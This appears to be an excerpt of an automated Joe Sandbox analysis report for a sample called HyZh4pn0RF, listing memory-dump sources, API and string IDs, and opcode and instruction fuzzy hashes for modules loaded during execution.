                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 596d36c56aa4a69f9e0de99c4446f67f66d98919578ebe391b982d32968e0018
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F78145A3B1A1D18DE3528E39D0545BE3AD8E702791F0581BAEECA473C1DA3CD987D724
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1505470444
                                                                                                                                                                                                                                                                                                  • Opcode ID: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 86a9729de075f959284c165b586dc94becb5ae3bfbedcacc693c025d579f7298
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F891D1A2A0AB81D1EA62CB29D8443A977A8FB45FA4F049375DE6D577D0DF3CD082C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                                                                                                                                                  • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                                                                  • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 15975c0cb5798efb3b96371d08c8b5dbea49a84011d11c958104b92cfa2d6cc6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4461FAB2F1A642D6E7658A35E4006BAB25AFF80F90F444275FE5947AC5DF3CE4038710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
                                                                                                                                                                                                                                                                                                  • Instruction ID: 84f2d8fd0f85e8d95af20e65da3de676f39bd78ba1370fdee853b09a952db892
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D51DC7260AB42D6EB56CB25E5806AD73A8FB49B84F144072EF4C47754EF39E453C328
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: $%!.15g$-
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-875264902
                                                                                                                                                                                                                                                                                                  • Opcode ID: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56c9377ec28c5212e66c615db8f32db6f7036a036dda46b0706926466bf1c305
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c624ad0bc44100b506bc71d4bfca6c8542f81e3f3e35595397915d470e7bca72
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C04107B2B1A785C2E611CB3EE4457AA7BA4EB96780F004166EE8E07755CB3DD506CB10
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c8b55dc5fc11e99bbcd6674da76a6f246ab2c8eacf66fb2ccc9fe854330277c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0841FFA2A19745C2EB618F25E08027D73A8FB85B80F561435EF8D4B794DF3CD802CB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$BoolCompareObject_Rich
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 74976934-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 57e13651b9a9e1f186a9b002a24521be0db223391998cd44a44a051f09cd007e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71118472A9A54285EB568B3DED44378A3B0BF15BB0F08A334DE79066F5DF2CD8908700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3617616757-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                                                                                                  • Instruction ID: 346d17c3f3388afb545fb8fec5403a41b2d5d9b4b6f3d3c1d2c5532ce95dc217
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7821C9B690760181EB6A9F78DC5837462B0AF15B39F24A338CE7E411E18F7EA4818310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836553428.00007FFBAB631000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFBAB630000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836525586.00007FFBAB630000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836582037.00007FFBAB632000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836611692.00007FFBAB634000.00000002.00000001.01000000.00000027.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab630000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                                                                                                  • Instruction ID: e3fd64ca7e4d43d19290955613649dd6a89843f59b6700378ee2299ab99724c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1110662B15B018AEB018F74EC942A873A4FB19758F446E31DE6D467A4DF78D198C240
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836441466.00007FFBAB621000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFBAB620000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836411766.00007FFBAB620000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836470162.00007FFBAB623000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836497438.00007FFBAB625000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab620000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e7e0c4cafddcbed1c7c71de9d45907e4d43c55c27e02f13b34c11552c1c5ce5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5111562F15B018AFB008F74EC542B873A4FB19B58F446E31EE6D867A4DF78D1988340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836320124.00007FFBAB611000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFBAB610000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836281824.00007FFBAB610000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836352217.00007FFBAB613000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836382631.00007FFBAB615000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab610000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1be4ed3b3c8428b121f9101a6f7b34abbbdb706154d432089b46c4bb851e2133
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42113A62B15B0189EB00CF74FC442A873A8F718759F041D32DE6D837A4DF78D1988340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4764871985beb07b2c87832b93818665b810fe1ea0db80f99aee4df8e7d5ba83
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9e6e1a99beb20024c39237dbb01f35985b29cf17aeeaa0b650d61652553da3b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86113A62B59B0589EF018FB4ECA42B873B4FB18758F441D31DE6D427A4DF38D1988280
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836808470.00007FFBAB651000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FFBAB650000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836782497.00007FFBAB650000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836836073.00007FFBAB653000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836866266.00007FFBAB655000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab650000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction ID: d55e7293b32d73ef2514255e3e24e9719b9c60ad9ad02fa189df6c3aefa1aee5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8114862B15B018AEB018F74EC446B973A4FB18B58F442E31DE6E427A8DF38D1A88350
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 28b91838cf368c57857a09685e2d42be6b425ac62e832b285bb0e5c091f1663c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA111C66B15F01CAEB008F70E8542B833A8FB19B58F440D35EE6D46BA4EF78E1598390
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1836922455.00007FFBAB661000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFBAB660000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836892940.00007FFBAB660000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836950286.00007FFBAB665000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1836978076.00007FFBAB666000.00000004.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837005009.00007FFBAB667000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab660000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
